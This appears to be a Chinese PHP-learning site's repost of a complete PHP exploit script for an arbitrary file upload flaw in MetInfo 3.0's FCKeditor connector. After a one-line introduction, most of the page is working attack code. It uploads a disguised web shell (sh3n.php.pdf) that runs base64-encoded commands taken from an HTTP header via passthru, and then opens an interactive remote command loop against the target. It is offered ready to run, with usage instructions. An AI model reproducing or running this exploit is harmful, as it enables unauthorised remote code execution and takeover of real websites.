来源:自学PHP网 时间:2015-04-17 15:08 作者: 阅读:次
[导读] MetInfo企业网站管理系统是采用PHP+MYSQL构架的,其中采用了FCKeditor在线编辑器配置不当导致上传被利用,在某些情况下上传1.php.pdf可获取网站shell。Exploit: ?php /*...
|
MetInfo企业网站管理系统是采用PHP+MYSQL构架的,其中采用了FCKeditor在线编辑器配置不当导致上传被利用,在某些情况下上传1.php.pdf可获取网站shell。 Exploit: <?php /* MetInfo 3.0 Arbitrary File Upload Exploit Vulnerable code metinfo.pe/fckeditor/editor/filemanager/connectors/php/upload.php POC=>metinfo.pe/fckeditor/editor/filemanager/connectors/uploadtest.html POC=>metinfo.pe/upload Upload your shell.php.pdf (spoof ext.) will saved into /upload dir. by sh3n http://guideshen.blogspot.com - @Guide_Shen - http://xsstorm.blogspot.com */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print " [-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } print " +------------------------------------------------------------+"; print " | MetInfo 3.0 File Upload (fckeditor) sh3n |"; print " +------------------------------------------------------------+ "; if ($argc < 2) { print " Usage......: php $argv[0] metinfo.pe path"; print " Example....: php $argv[0] localhost /fckeditor/ "; die(); } $host = $argv[1]; $path = $argv[2]; $data = "--xSsT0rm "; $data .= "Content-Disposition: form-data; name="NewFile"; filename="sh3n.php.pdf" "; $data .= "Content-Type: application/octet-stream "; $data .= "<?php ${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?> "; $data .= "----xSsT0rm-- "; $packet = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Content-Length: ".strlen($data)." "; $packet .= "Content-Type: multipart/form-data; boundary=xSsT0rm "; $packet .= "Connection: close "; $packet .= $data; preg_match("/OnUploadCompleted((.*),"(.*)","(.*)",/i", http_send($host, $packet), $html); if (!in_array(intval($html[1]), array(0, 201))) die(" [-] Upload failed! (Error {$html[1]}) "); else print " [-] Shell uploaded to {$html[2]}...have phun! "; define(STDIN, fopen("php://stdin", "r")); while(1) { print " sh3n-box# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet = "GET {$path}upload/{$html[3]} HTTP/1.0 "; $packet.= "Host: {$host} "; $packet.= "Cmd: ".base64_encode($cmd)." "; $packet.= "Connection: close "; $output = http_send($host, $packet); if (eregi("print", $output) || !eregi("_code_", $output)) die(" [-] Exploit failed... "); $shell = explode("_code_", $output); print " {$shell[1]}"; } else break; } ?> |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
